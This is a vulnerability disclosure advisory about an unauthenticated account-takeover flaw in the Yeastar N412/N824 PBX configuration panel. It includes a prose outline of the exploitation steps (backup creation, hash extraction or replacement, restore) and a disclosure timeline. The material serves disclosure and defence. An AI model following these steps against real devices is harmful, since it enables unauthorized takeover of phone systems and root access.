Swascan Offensive Security Team has identified several vulnerabilities during a Penetration Test on Yeastar PBX Configuration Panel series N.
After contacting the vendor on multiple occasions no official reply has been issues as of 19/10/2022. Swascan has published this responsible vulnerability disclosure well after the 90-day grace period recommended for this activity.
Yeastar is a Chinese company with a solid technical vendor for PBX Systems and VOIP solutions.
Yeastar develops and manufactures products and solutions for remote collaborative systems.
Swascan Offensive Security Team found an important vulnerability on: Yeastar N412 and N824 Configuration Panel.
|Account Takeover via restoring altered backup file||9.8 Critical||AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H|
In the following section the technical details about this vulnerability, including evidence and a proof-of-concept. This vulnerability can affect hundreds of Internet-connected devices.
In Yeastar N412 and N824 Configuration Panel, an unauthenticated attacker can create backup file and download it, revealing admin hash, allowing, once cracked, to login inside the Configuration Panel, otherwise, replacing the hash in the archive and restoring it on the device.
It is possible to launch the attack remotely without any form of authentication.
Proof of Concept
To achieve the account takeover those steps are performed:
- Unauthenticated backup file creation
- Download the .tar file created
- Crack admin hash inside the archive an then log into the device, or modify the .tar archive replacing admin hash
- If it was not possible to crack the hash, then we need to upload the new altered backup file
- Restore the backup file uploaded
- Reboot the device if needed
Following details on exploitation steps:
- Requesting creation of backup file with a given name.
2. Download the backup file just created.
3. Inside the previous response we found the admin hash. Once gained the admin hash we can try to crack it, otherwise, we can modify the archive and upload it to the device.
4. Then we restore the uploaded configuration backup file.
5. If needed, we can trigger a reboot to reload the configuration with the new password.
An attacker could obtain access to the remote system, and furthermore enable the ssh console which has a default root password when activated and execute arbitrary commands on the Linux-based system as root user.
The Swascan Offensive Security Team suggests to do not deploy the device directly on the internet, instead set up the device behind a VPN connection.
- 04-03-2022: Vulnerabilities discovered
- 08-03-2022: Vendor contacted by email (1st time, no reply)
- 14-03-2022: Vendor contacted by email (2nd time, no reply)
- 23-03-2022: swascan report the issued to CERT/CC
- 28-06-2022: CERT/CC did not receive any response back from the vendor
- 07-07-2022: vendor contacted by email
- 17-10-2022: Swascan disclose the vulnerability
- 20-01-2023: CVE issued CVE-2022-47732